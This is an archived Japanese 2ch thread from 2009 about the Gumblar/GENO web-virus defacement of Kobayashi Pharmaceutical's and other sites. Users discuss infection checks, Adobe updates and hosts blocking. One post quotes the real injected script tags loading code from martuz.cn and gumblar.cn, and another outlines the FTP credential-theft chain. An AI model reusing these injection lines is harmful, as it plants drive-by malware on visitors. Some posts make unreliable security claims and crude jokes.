【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性（小林製薬）[09/05/14]

□サイトが改ざん被害、閲覧でウイルス感染の可能性（小林製薬）[09/05/14]

　小林製薬株式会社は5月12日、同社の一部のサイトに改ざんが確認された
と発表した。改ざんされたページを閲覧することで、ウイルスに感染する可能性が
あったという。発表によると、改ざん被害を受けたのは5月9日5時27分から5月11日
21時27分の間で、改ざんされたページは以下の通り。

・暮らしのヒントお知らせ隊（hint.kobayashi.co.jp/）
・ハナノア ブランドサイト（hint.kobayashi.co.jp/hananoa/）
・イージーファイバー ブランドサイト（hint.kobayashi.co.jp/easyfiber/）

　これらのページを閲覧することで、ユーザのPCがトロイの木馬に感染する可能性が
あった。この感染により、PCに「sqlsodbc.chmの改変」「コマンドプロンプトが起動不能
になる」「レジストリエディタが起動不能になる」といった影響があるという。
同社ではこれらのページを停止し、復旧作業を行っている。

https://www.netsecurity.ne.jp/1_13282.html　（引用元配信記事）
ScanNetSecurity - スキャン・ネットセキュリティ
https://www.netsecurity.ne.jp/　[09/05/14]　配信
http://tsushima.2ch.net/test/read.cgi/newsplus/1242193515/623 依頼

■弊社サイトの改ざんに関するお詫びとご説明〜小林製薬株式会社

閲覧により感染した可能性のある期間

５月９日（土）　５時２７分　〜　５月１１日（月）　２１時２７分
※アクセスログを再調査した結果、５月９日（土）５時２７分、
上記サイトの一部に改ざんがあった事が判明しました。（更新日：５月１４日）
http://www.kobayashi.co.jp/info/090512.html　（引用元Web site）
サイトが改ざん被害、原因は管理PCのウイルス感染（薬事日報）2009年04月27日
https://www.netsecurity.ne.jp/1_13221.html （引用元Web site）

ニュー速でスレ立ってる奴か。
まとめ見ちゃってびびってた

GENOウィルスもここまで北か

小林製薬 サイトナオサナイト

ロサイト

現実は豚インフルでネットはGENOウイルスか

小林製薬の糸ようじ

genoの？

小林製薬の糸ようじ

こえぇぇぇ！
2ちゃん見ただけでアホになる
ウィルスと一緒じゃんwww

平賀サイト

>>4
小林製薬新たなビジネスチャンス。

「感染そのあとに」

生活に必要のないものばかりを売る会社

製薬会社がウィルスに感染って笑えるなぁ

ついに立ったか

これ踏んだだけでアウトで、ワクチンないから初期化しかないからな
ブルースクリーン頻発クレカ情報抜かれるし

ちゃんとチェックしとけよ

小林製薬 ミタダケデアボーン

これGENOなのか？

ミタラカカール

小林製薬の糸ようじ

見ただけで感染というが、ActiveXとJava切ってありゃ問題ないんだろ？

見ただけでいきなりアウトかぁ
被害者多そうだね

>>21
JavaとJavaScriptの区別もついてないようでは危ないな

JAVAとJavaScript

>>15
これ、洒落にならんね、ほんと、

ウィルスばら撒いてワクチンで儲けるのはよくある話だろ

ァッ! 小林製薬

小林製薬の感染元

Adobe Flash PlayerとAdobe Readerの脆弱性を突いて感染するので
JavaScript切っておいてもダメだと思う

因みに東方、ボカロの有名サイト感染らしいから
ニコ厨は終わったな

>>23
JavaScriptのことをJavaって略しただけなんだけど
JavaとJavaScriptの違いぐらいわかってますぅヽ(`Д´)ﾉﾌﾟﾝﾌﾟﾝ

これってGENOウイルス？

なんで小林製薬なんだ？

>>32
yes

小林製薬のホスト感染中

なんかもうごっちゃになって、院内感染みたいな感じで批判されるだろうな
小林製薬は。全然違うレベルの話なのにな。

感染たらいいなをカタチにする

小林製薬の製品ってストレートな名前ばっかなのに、
フェミニーナ軟膏だけ誤魔化してるよな。

マンコール軟膏に改名すべきだ！

企業のトップページって
いちいちフラッシュだのJavaだの使っていてウザイよな。

シンプルに、テキストと画像だけにすれば
見るほうも気楽だし、今回のようなことも無いのに。

>>31
その顔文字見るとイラつく

またGENOか

非常に凶悪なウイルスなので、感染したPCはOSクリーンインストールするか廃棄してください
現時点で感染前の状態に戻す方法はありません

クエンカの街を彩る小林製薬の糸ようじ

>>39
それだとウェブ屋が高い料金ふっかけられないかららしい
つまり真の犯人はマカ

GENOウイルス(亜種)はどんどん広がっているな
感染サイト行っただけで感染するのが悲惨
感染したらクリーンインストールしかない
クレカとかのPASも取られるし
フリーアンチウイルスのavast!が対応早いらしいが

>>38
フェミにいいな→フェミニーナ

>>38
>デリケートゾーン

kwsk

>>44
なるほど、アホな話だなぁ。

重いページにイラついて、二度とそのページに行かない奴だっている。
それって、ビジネスチャンスを逃してるって事なのにね。

FTPじゃなくてSSH使ってればサーバへの侵入は防げたのにな
しかも外からFTPで接続出来るとか馬鹿じゃねーの？って感じ
これも「SSHはわかりません」とか平然とぬかしやがる
腐れマカのウェブ土方のせいだよな

なんだか最近、PCが変だ・・。
オレも感染したかも。

・気がついたらAVGの常駐アイコンが消えていた。
・avgの自動更新が出来なくなった。
・CCクリーナーが使えなくなった（ファイルが壊れてると表示される）

ウイルスまとめてポイ

>>48
FLASHが重いサイトは、余程魅力がないと二度と行かないよな。

>>48
社内の人にウケるかどうかが大事でそれが全てだからそうなるのは仕方ない

スクリプトとか切ってるのでフラッシュ無しで見られないとこはスルー

https://www.netsecurity.ne.jp/1_13221.html

1.「同サイト」を管理していた「社内PC」1台にコンピュータウイルスが感染
2.コンピュータウイルスは感染した「社内PC」のFTP通信を監視
3.コンピュータウイルスは感染した「社内PC」のFTP通信で使用された「設定情報」を記録
4.コンピュータウイルスは記録した「設定情報」を同社とは無関係の外部サーバに転送
5.外部サーバは「設定情報」を利用し「同サイト」にFTP通信で不正にアクセス
6.外部サーバは「同サイト」のhtml,php,js等のウェブ関連ファイルの一部をダウンロード
7.外部サーバはダウンロードしたファイルに悪意あるスクリプトを一定条件のもとに挿入
8.外部サーバはダウンロードしたファイルを「同サイト」にアップロード

こっちでも感染か・・・

BackTrackを使ってセキュリティをテストする - SourceForge.JP Magazine
ttp://sourceforge.jp/magazine/08/06/17/017244
Remote-Exploit.org - Supplying offensive security products to the world
ttp://www.remote-exploit.org/backtrack.html

backtrack - Google Search
ttp://www.google.com/search?q=backtrack

小林製薬のバックドア

アンチウイルスとアドビ関係のアップデートしてれば大丈夫だろうに
なんで感染するかなぁ

「よく使われる危険なパスワードTop500」にご注意を
ttp://slashdot.jp/security/comments.pl?sid=433667&cid=1486395

＞実体験 (スコア:5, 参考になる)
＞sayuporn (33927) : 2009年01月06日 20時38分 (#1486395) 日記

＞サーバをインストールして、先方に渡し、
＞DCに設置してもらってネットにつながってから色々作業しようと思ってました。
＞で、rootのパスワードに「123456」を設定してました。

＞メールで「ネットにつなぎましたよー」と連絡もらって、
＞さあ作業しようと思ったらログインできません。ぎゃふん。
＞東京から横浜まで行ってもらい、パスワードを再設定してもらいましたが、
＞同じく「123456」だったので、その方がDCを出る頃にはまたワームに犯されてました。

＞ワームに犯された上、ルートキットを孕ませられてしまったので、
＞passwdでパスワードを変更してもshadowファイルを書き換えられてしまいます。
＞のでしょうがないので、cronで1分おきにshadowファイルを上書きするようにして、
＞泣きべそ書きながらrsyncでルートキットを駆除しました。

>>52-53
社内のLAN経由で表示テストして
実際の回線を使った場合、どれだけ重いのか気が付かないとか
ありそうだよね。

この前、殺虫剤のCMが気になって製薬会社のホムペ見たからドキッとしたけどコヴァか、よかった見たのは緊張だった

♪うちの亭主はグアテマラ生まれ〜

>>53
ワンマンで、頭の悪い、センスの無い社長の会社の場合、
よいしょして社長をコマーシャルに出させる、ってのと似た感じの戦略だな。

オンラインゲームでは数年前からあったな、そっちの犯人は中国だが。

このレベルの会社は自社でサーバを立てるべきじゃないよ
適当な大手のブログを選んで、
そこに自社のページを作る程度で妥協しておくべきだ
まぁブログへのアクセスにSSL使わなきゃやっぱりやられてたかもしれんがｗ

>>65
政府関連の天下り機関は金があるので自社サーバー

>>47
おれもでデリケートゾーンがなんなのか気になって眠れない毎日を過ごしてる。
デルピエロゾーンの仲間？

>>48
>>39
>>52
>>63
お前らは一度フジテレビのホームページに行ったほうがいい。

>>67
スクール水着の裏地が付いてる部分のことだ

感染したかな…

ウイルス対策ソフトの期限切れててさ…

改ざんするにしてもなんで小林製薬なんだろうね？
俺が知らないだけでものすごい人気サイトだったとか？

martuz.cnに飛ぶパターン
成美堂出版HP　<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
replica08●web●fc2●com　<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>
sound●jp/yudai_marimba/　<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>

gumblar.cnに飛ぶパターン
www●laqoo●net/kyouun/pet/index.html　<script src=//gumblar.cn/rss/?id="+j+"><\/script>
pmpk●dojin●com　<script src=//gumblar.cn/rss/?id="+j+"><\/script>
　
　
hosts書き換えて「zlkon.lv」「gumlar.cn」「martuz.cn」をアウトにしておくと(今は)ＯＫ
ただこの３つ以外にもあるかもしれないし、今後は増える
hosts書換えが嫌ならローカルプロキシとかプライベートプロキシとかの「ＰＣ内プロキシ」を入れて使えばいい
　
　
結論：adobeを今すぐ最新にすればいいだけじゃん(既に感染してたらクリーンインスコ♪)

>>59
セキュリティソフト入れたりWindowsアップデートはする人が多いけど
adobeのソフトウェアのアップデートはあまりする人がいないからじゃないかな
最近感染した人はともかくGENO初期はavast以外検出出来なかったし

チンコムケア

>>65
サービスで提供されてるブログ記事書くのにSSLって一般的なの？

そもそも大手会社のサイト管理者の端末が
ウイルスに汚染されてるっていうのが凄いなー。どっから貰ったんだろ。

>>1

新たな「Webウイルス」が猛威、感染被害が急増：ITpro
英ソフォスが報告、正規サイトでもWebアクセスで被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/

>今回報告されたウイルスは、同社が「JSRedir-R」と命名したもの。
>実体はJavaScriptで書かれたプログラム（図1）。多くの場合、攻撃者は何らかの方法で正規サイトに不正アクセスし、
>このウイルスをWebページに埋め込む。そのページにユーザーがアクセスすると、
>埋め込まれたウイルスが動き出し、別のウイルスを勝手にインストールされる恐れなどがある。

>同社がこのウイルスを確認したのは2009年4月30日。その後、感染報告数が急増。
>2009年5月6日から同月13日までの同社の観測データでは、
>Webページに埋め込まれるタイプのウイルスの42％が、このJSRedir-Rだったという

アドビ、深刻度「最高」の脆弱性を修正するReader/Acrobatのアップデートを公開（Computerworld.jp） - Yahoo!ニュース
http://headlines.yahoo.co.jp/hl?a=20090515-00000005-cwj-secu

AntiVir入れてる俺のPCには無関係な話だよな？

>>4
wwwwwwwwwwwww

ページ見ただけで感染だから
豚なんとかより遥かに感染力高くて恐ろしいウイルスなのに
まだ知らない人多そうだよな

>>1
441 名前： ムラサキサギゴケ(catv?)[sage] 投稿日：2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス（医療情報提供企業）【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO（PC通販ショップ）【キャッシュ削除済】
・NHT紀尾井町グループ（自毛植毛斡旋企業）【対策済】
・SayMove！【対策済】
・ライブハウス「あさがやドラム」【対策済】

>>71
「製薬会社」なのに、「ウィルスに感染」っていうネタじゃねーの？

adobeのソフト最新版にするのは効果的だけど
アンチウイルスソフトは
亜種の多さからほとんど対応できてないから注意

acrobat7使ってるんだが、やばいのか
アップデート無いんだが

どんだけ新型の感染拡大が広がってるんだよ・・・

>>50
あきらめて、クリーンインストールしろ。
>>59
セキュリティソフトは結構ザルだったみたいよ。
それに重くなるので、アドビ関係のアップデートしない奴多い。

>>81
思いつかなかったww

avast!は対応済みか、今度そっちも入れようかな
これってネカフェも怖いな、とりあえず
Adobe Flash PlayerとAdobe Reader最新のを
入れておいたらおｋ？

あとブラウザーはOperaかfirefoxもいいとかあったけど本当？

>>75
ログイン画面くらいはSSLの所探せばあるだろ
でも終わったらログアウトを習慣付けないとクッキー取られてだめか

カスペってまだ対応してないの？

>>81
ジョークグッズ屋だから、ピンとこないのも仕方が無い

>>87
プロキシとかファイアウォールとか、その辺の対策無しで
javascript切ってないんだったらブラウザ変えても意味無い気がするけど。

>>87
firefoxで、アドオン「NoScript」ってのを入れておくといい。

基本、全てのスクリプトをOFFにしておいて
サイト観覧で不都合が出た時だけ、個別にONにすることが出来る。
便利だよ。

chromeはそこらへん融通きかんのだよなぁ･･･

「GENOウイルスだそうです」
「痔のウイルスか…当社製品に塗り薬あったかな」

>>79
そりゃＴＶでやっていないからな、そんなもの

>>85
MSがWindows UpdateでFlashとAdobe Reader配布するようにして欲しいな
ていうかサードパーティーがWindows Update利用する枠組み提供しろや

>>87
Firefox入れるだけじゃなくnoscriptアドオンも併用しないとだめ

>>88
ブログサービスってあんまり使わないから
httpsで接続できるのってmixiくらいしか見たこと無いな。

Flash Blockも合わせて使っちゃいなYO

NoScript入れとけばFlashblockはいらなくね？

マカフィー使っている俺には関係ない話だな

>>99
そうか・・・
にわかでスマン

>>101
あーでもNoScript使ってて不満なのは
許可与えるとJavaScriptもFlashも両方いっぺんに解除されちゃう事なんだよな
JavaScriptだけ許可してFlashだけブロックしたいって事はあるかも

>>100
マカフィー使ってれば安全なのか？

>>100
マカと間違われて困ったりしないか？

ウィルスバスター常駐監視の俺でもやられた
パターンファイルのアップロード中は常駐監視がオフになるという
基本的な事を無視してあるサイトの画像をダウンロードしたのが原因
一番最初に起動ファイルを壊されて再起不能
結局はＯＳのクリーン再インストール
とんでもねえ目にあっちまったべ

　　　　サーバはlinuxを使え！

>>100
それはオカフィーだろ

タミフルでも打っとけ

>>106
Linuxでしたけど何か？
http://toolbar.netcraft.com/site_report?url=http://hint.kobayashi.co.jp

Avast使っててよかった。でも小林製薬なんか見ないよ。

小林製薬の、糸ようじ

IPをwhoisしてみるとファーストサーバでホスティングかレンタルしてたんだな
そこにFTPで呑気に接続してたのか

伸びないね、かなり重要なことなのに

>>108
タミフルは注射じゃないですけど

パソコンにマスクをつけていないから

VistaはUACが警告を出すので、普通に使ってる限りは大丈夫

>>113
このスレが伸びるくらいならVistaの売上ももうちょっと伸びてるだろｗ

また中国の仕業だな

国際社会から追放しろよ

感染その後に

ここの製品はネーミングだけじゃなく効能も胡散臭い気がする

あっ！小林製薬。

まあ小林製薬はへぼかったけど、
カカクコムメソッドがはびこる今の日本で
感染の経緯をつきとめ正直に公開した事は評価したい
対策が出来たらそれも公表して欲しいね

NOD32を使ってるけどやられてる可能性あるのかな。このソフト信用してるだが。

心当たりがあったので、今、ウィルスチェックしてみたけど
感染しなかったようだ。一安心

>>122
ス

GENOの対策はキャッシュ消去してくださいはﾜﾗﾀな

ヤフーも地震速報見たいな感じでアップデート促してくれたらいいのに

クアンカの街を彩る・・・小林製薬の糸ようじ！

>107

>>125
なんだそれｗｗひでぇｗｗｗ

何が目的でこんな事するんだ

しかし俺毎日GENO見てたのに
なんでかかってないんだろ
かかってて気づいてないだけかもしれんが

ニフティの件はデマだったのか？
だったらデマスレ立てたやつは逮捕でいいよ

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認

>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと＝システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS９以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。

こういう事する奴って一体何が目的なの？何が楽しいんだ？
動機は何だ？小林製薬に対する恨み？

>>135
政権交代

>>1
恐くてどこのサイトにも行けねぇ・・・

意外とやばい話題なのに現実世界のパンデミックのせいで盛り上がらんね

>>1
https://www.netsecurity.ne.jp/1_13221.html
ウィルスが直接サイト改ざんするんじゃなくて外部サーバを経由するのか。
ていうことは、この外部サーバがランダムなアドレスとかだとアクセスログ監視でも見つけにくいな・・・

これ結構やばくないの

単にFTP鯖の外部からのアクセス切るかホワイトリストにすりゃいいだけ

一般ユーザならともかく、Webサービスやってる企業で固定IP引いてないって事はないだろ

カカクコムほどではないだろ

価格コムより酷いよｗ

ねずみ算式に感染元が増えるんだから

やっとか。
一部の板では一昨日から大騒ぎになっていたというのに

Windowsでネットするなんて神戸の高校に全裸で父兄参観するようなもんだろw
アンチウイルスなんてどこまでいっても対処療法。
OSの作り自体が悪いんだから、いつまでたっても抜本的には解決しないよ。

　.糸 .小
　.よ　林
　 う　製
　 じ　薬
　　　 の

質問！
なぜクリーンインストールじゃないと直せないんだ？
ファイル上書きでなんとかなりそうだが

広がりに輪をかけてる一因として
突いてる脆弱性がAdobeのJavascriptインタプリタだからってのがある

Adobeって普及率稼いでる割に自動アップデートとかしないんだよね
致命的な欠陥でも告知しねえし

脆弱性自体は数ヶ月前に塞がれている物なのに
ユーザにアップデート告知しないで脆弱性の修正だけ公開したから
攻撃手段だけ公開したような状態になってる

本格的にバカかと

やばいいいいいいいいいい

>>147
改竄されるファイルがまだ全て判明してないから
亜種が出るのが早いって理由もある

ロリコンサイトへのウイルス埋め込みにも対処して下さい。
パソコン一台潰しちゃいました

とりあえずボカロとか東方とかのサイト回ってるヲタは注意しろ
感染率がひどいことになってる

どうせ感染したんだしと意図的にバラまいてるやつもいるみたいだぞ

なあに、かえって免疫力がつく

国民には冷静な対応をお願いしたい。

Vistaを買わせたいMSの陰謀です

ここ数日使ってないネットブックを立ち上げたら
ウイルスバスターがいないと言われて
再起動したらブルーだったけど
大丈夫だよな

改竄

>>150
なるほど、ありがとう。
ネット繋がってない我が家は最強ですね。

cmd.exe試したけど大丈夫だった・・

しかしこわくてどのサイトにもいけんな
マカフィー期限切れそうだし

オススメのフリーセキュリティソフトあったら教えてくれ

ネットをすればＧＥＮＯウィルスに感染し、外に出れば豚インフル

これすごく感染危険度が高いんだが・・・

このスレタイじゃ「関係ないや」って見もしない奴が大半だろうな。

ニュー速＋たつのが1日はおくれとる
おせ〜

http://tsushima.2ch.net/test/read.cgi/newsplus/1242193515/681

もう一回依頼しといたけど無視される気がする

>>160
貧乏人乙ｗ
フリーなんて言っているようではダメダメだな

インターネットって怖いですねぇ
安心して見る事もできないんですねぇ
やはりテレビを見ているのが一番安心のようですね＾＾





なーんていう風になるといいですね！マスゴミさん

>>132
デマっつーか、単にnifにホムペ開設してた子がウィルスにやられたんじゃね？
で、ftpでホムペのページ更新したとたんにftpのパスワードをサクッと盗まれて
外部からindex.html改竄されたんだろうね。
自分は悪くない！と思ってるからNifのサーバがやられたに違いない！ってファビョったんだろｗﾊﾞｶｽｗｗ

>>1
＋板、スレ立つのおっそ〜〜ｗｗｗ

セキュリティ板やν速無印じゃとっくに話題になってるぞ

コンピュータウィルスだけは体がやられるわけじゃないから過剰に騒ぐ必要なし。
ソフト屋に勝手に騒がせておけばいい。

セキュリティソフトを一度も使わず12年の俺が言ってみる。

>>160
今のところavast!はこのウイルス探知できるらしい
でも亜種も出てるからどのウイルスソフトもアウアウだと思っといたほうがいい

小林製薬の糸ち○こ

>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと＝システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS９以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。

東方、ボカロの大手サイトも感染してるからな
お前ら大丈夫か？
感染サイト踏んだらアウトだぞ？

>>133
ウイルスに感染してる場合cmd.exe（コマンドプロント）で
DOS窓開けると重症化するんじゃないの？心配だなあ

これ↓か。なんで今さらスレが立つんだ？



弊社サイトの改ざんに関するお詫びとご説明?

差出人: 【小林製薬】暮らしのヒントお知らせ隊 ([email protected])
送信日時: 2009年5月13日 10:20:26
宛先: ●●●@hotmail.com

いつも「暮らしのヒントお知らせ隊」メールマガジンをご愛読いただき誠にありがとうございます。
この度、弊社サイトの一部（「暮らしのヒントお知らせ隊」含む）において第三者による改ざんが確認され、
当該期間に下記サイトを閲覧された方にウイルス感染の恐れがあることが判明いたしました。
■閲覧により感染した可能性のある期間　5月10日（日）20時23分　〜　5月11日（月）21時27分
■改ざんされたサイト　・暮らしのヒントお知らせ隊　・ハナノア ブランドサイト　・イージーファイバー ブランドサイト
上記期間に当該サイトにアクセスされた皆様におかれましては、誠にお手数ではございますが、
下記URLにて対応をご確認下さい。 http://www.kobayashi.co.jp/info/090512.html
平素から弊社サイトをご覧いただいている皆様にご迷惑をおかけしましたこと、心よりお詫び申し上げます。
引き続きサイトの安全管理には万全を尽くしてまいりますので、今後ともよろしくお願い申し上げます。
――発行―――――――――――――――――――――――――――――
「暮らしのヒントお知らせ隊」メルマガ会員対応係 ・お問い合わせは下記まで
https://hint2.kobayashi.co.jp/webapp/hear/org/showEnquete.do?enqueteid=12&clientid=10034&databaseid=yvo

国交省整備局のＨＰがウイルスに感染！！

ってタイトルだったらもうちょっと食いついてたかな

【ﾈｯﾄでも】GENOｳｨﾙｽ亜種が爆発的に増殖か 小林製薬や同人ｻｲﾄ他中心に感染も★5【新型ｳｨﾙｽ拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242555395/

・小林製薬【対策済】
・BIG-server.com【対策済】　　←２ｃｈの鯖屋
・ウェルネス（医療情報提供企業）【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO（PC通販ショップ）【キャッシュ削除済】 　 ←　このバカショップが蔓延させた
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
・NHT紀尾井町グループ（自毛植毛斡旋企業）【対策済】
・SayMove！【対策済】
・ライブハウス「あさがやドラム」【対策済】

>>169
ニートさんですか?
会社のPCがやられてしまうと企業にとってはダメージなんですよ、知ってました?

そのウイルス、人にも感染しますか？

>>157
再起動してブルーバックは感染しとる。

ノートン先生だのは反応しないので、チェックして安心と思っているやつは気をつけろ。
>>133の確認を忘れるな。

>>174
重症もなにも、感染した時点でｵﾜﾘだから、関係ないんじゃないかな。
どっちにしたってクリーンインストールしか対処方法がない。

sqlsodbc.chmがそもそも存在しねえぞ

>>177
このリストだけ見てると大して広がってないように見えるよなー
実際に報告されてるサイトだけで100件以上あるわけだが

つーか、いい加減Windowsでネットは禁止にしろや。。

>>38
マンコかゆくない
女性器かゆくない

>>180
Thanks
いや昨日確かめて立ち上がるし、ファイルサイズも変わってないんだが
やっぱり亜種かな

>>183
正規のWebサイトに感染する新手のマルウェアが勢力を急拡大している。
2009年05月15日 08時24分 更新

5月6日〜5月13日のマルウェア報告数（Sophos調べ）　
セキュリティ企業の英Sophosは、正規のWebサイトに感染する新手のマルウェアが出現し、猛威を振るっていると伝えた。

このマルウェア「JSRedir-R」はSophosが5月初旬に発見し、その後勢力を急拡大。
5月6日から13日の1週間の統計では、Webサイトに感染している全マルウェアの42％を占める規模になり、
これまで広く出回っていた2位の「Iframe-F」（7％）を大きく引き離した。

http://image.itmedia.co.jp/l/im/news/articles/0905/15/l_malware.jpg　　←　ぶっち切りｗｗｗ

気付くの遅くね？

>>187
ごめん　画像コッチ　http://image.itmedia.co.jp/news/articles/0905/15/l_malware.jpg

サイトを見てるだけでウイルスに感染するというミラクル体験ができるのはWindowsだけ！(笑)

ここにもキチガイどもが集まりつつあるようだ

yarai2009の評価版まだかなぁ
あれならこういうのパターン無しで防御可能らしいんだが

>>168
腐女子板でもとっくに話題だったｗ

>>193
そりゃ、同人サイトが感染しまくりだったからだｗ
当然といえば当然

冷えピタン

>>192
あれはヒューリスティック検知だろ
今時のアンチウィルスでヒューりっテック検知搭載してない方が珍しい

>>196
普通のヒューリスティックだけじゃないお
こういう脆弱性狙った攻撃に特化したモジュールがあるの
説明聞いた俺が言うんだから間違いなし。

可愛い腐女子に手取り足取りLinuxの使い方を教えてあげたい

>>197
説明を鵜呑みにするのはお花畑の仕事だろｗ

もうちょい大きく取り上げようよこれ

おれは可愛い婦女子に手取り足取りLinuxの使い方を教えて欲しい

マックに替えて悠々とエロサイト巡り中のオイラが通りますよ・・・

>>199
いやいや
キミのいう「ヒューリスティク」と考えてるのはあのソフトの一部に過ぎない
ちゃんとどういう仕組みか見たの？

>>202
Adobe製品が問題の根本なんだからMacに変えても本質的な解決にならんだろ

こういうニューススレはsageで書いちゃいかんよ。

★２まで行けば、そのときのスレタイに
「同人サイトがパンデミック？？」
とかつけておけばみんな見るだろう。

★２まで行くかな…

そのためにはパンデミックちゃんのAAが必要だな

ageで書こうageで！
ウィルス警報発令だ！

>>204
マックというかUnix系のOSで「見ただけで感染する」なんてバカげたこと
起こりようがないからw

まとめ見たら恐くてどこも踏めないんだけど
というか、まとめすら恐くて今日は見ていないｗ

>>208
前例がないだけで、ありえなくはないと思う。

糞製薬会社
潰れちまえよ

>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと＝システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS９以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。

>>198
襲えてお兄様

>>208
UNIXでもLinuxでも起こりえる話だ
マカは愚かだな
俺はLinuxを使っていてもFlash Playerの脆弱性については常に注意を払っている

普段よりPCが熱かったり反応がだるい気がするから新型ウイルスに感染したかも！

こうですか？

>>214



・・・・・ムリw

>>197
>>199


【セキュリティ】定義ファイル使わない国産ウイルス対策ソフト「yarai」、Winnyの脆弱性を発見した鵜飼裕司氏らが開発［09/05/14］
http://anchorage.2ch.net/test/read.cgi/bizplus/1242318155/100

100 名前：名刺は切らしておりまして[sage] 投稿日：2009/05/17(日) 20:28:03 ID:ccyGmsXQ
このyaraiとやらも４つのヒューリスティックエンジンと言ってるけども、記事
やHPの内容を見る限りでは、一般的なスタティック・ヒューリスティック法
の部分はスタティク分析エンジンとかいう部分じゃないかな。
SandBoxエンジンは、ダイナミック・ヒューリスティック法ってやつだと思う。
たぶんノートンがこれに近いことをやってる気がする。
HIPSエンジンとやらはどう見てもビヘイビアだろう。
カスペルスキーのプロアクティブディフェンスがこれに相当するのでは。
ZDPエンジンてのは分類が判らない。今までこういうの自体あんま無かったし。


引用終わり

そもそも100%の対策ソフトなんて存在するわけ無いんだが、
ソースネクスト製品あたりの人は、買い換えた方が無難だろうね。
あと、adobe製品のアップデートやOSのアップデートも怠らないように。
一太郎とかもだっけ？

win
mac
linux
使ってるけど一番穴の多いのはmacだよ
誰も狙わないからいまんとこ大丈夫なだけで

電脳化してる人が閲覧するとマズイよ

　 　　 ト-- ､
　　 　 ',:::::::::::::＼　　　＿＿　　　　　_,,.. -‐ｧ
　 　 　 .〉::::::::::::::::`く´　　　　｀＞''"´:::::::::::::|
　　　　 |::::::::;＞─- ＞- ､ '"´:::::::::::::::::::::::::|
　　　　 |::／　　　　　　　　`'＜::::::::::::::::::::::::!
　　　　 / 　／_ ﾊ　　　　ヽ.　　＼:::::::::::::::::ﾊ
　　　　,|.　7　|_/｀|　　ﾄ 、.__',　　　Y ￣＼:::|
　　　 /|　 |　ｧ7ヽﾍ.　 ! ´＼_|　　　|､:::::::::::＼　　　　感染拡大
　　∠:::〉　|/` j_り　＼|ｧ'Tこヽ、　 ! ＼:::::::::::ﾊ
　　　 〈／ 7""　 　 　 　 j___ン|　 ,ﾊ 　∧__,ｒ┘
　　 ＜.　　ﾄ 、　 l7 =‐┐ ""/ |／ /／ﾚ'´　　　　　　　 　＿◎　　　　 ＿＿＿
　　　　｀ ｰﾚﾍ ＞､.,___.ノ_,,.イﾍ＞::''"´7/）-‐っ　 |￣|┌┘ └┐ /ヽ　|＿＿　 | [][]
　　　　 　　　 ／7ト::-＜::::/ /::::::::::::::::||　 ｀ く 　 |　/　￣|　|￣ /　/___.　 ／／
　　　　　　 　,|::/．`ー‐''"． !::::::::::::::::::||--.rイ 　 |　|_ ｒ‐┘└､/　,-┐ |_〈　〈_
　　　　 ,..-／::7.：　　　　 ： ,トｧ‐-- ､_||:::::_|/　　..|＿_|| ()　 r､」__/　.|＿_| ＼__]
　　r- /::::::::::::;|＼＿＿_／/ 〈　　　　　￣　　　　　　　￣￣
　　と||::::::::::::/ ｀＞-‐＜ く 　 ＼ 　　　　　　 　 |￣|＿＿＿___
　　　||::::::::::/／ 　 　 　 ＼＼ 　 >、 　　　　 　 |＿＿＿＿＿|　　　　　　　／ ￣￣￣.|
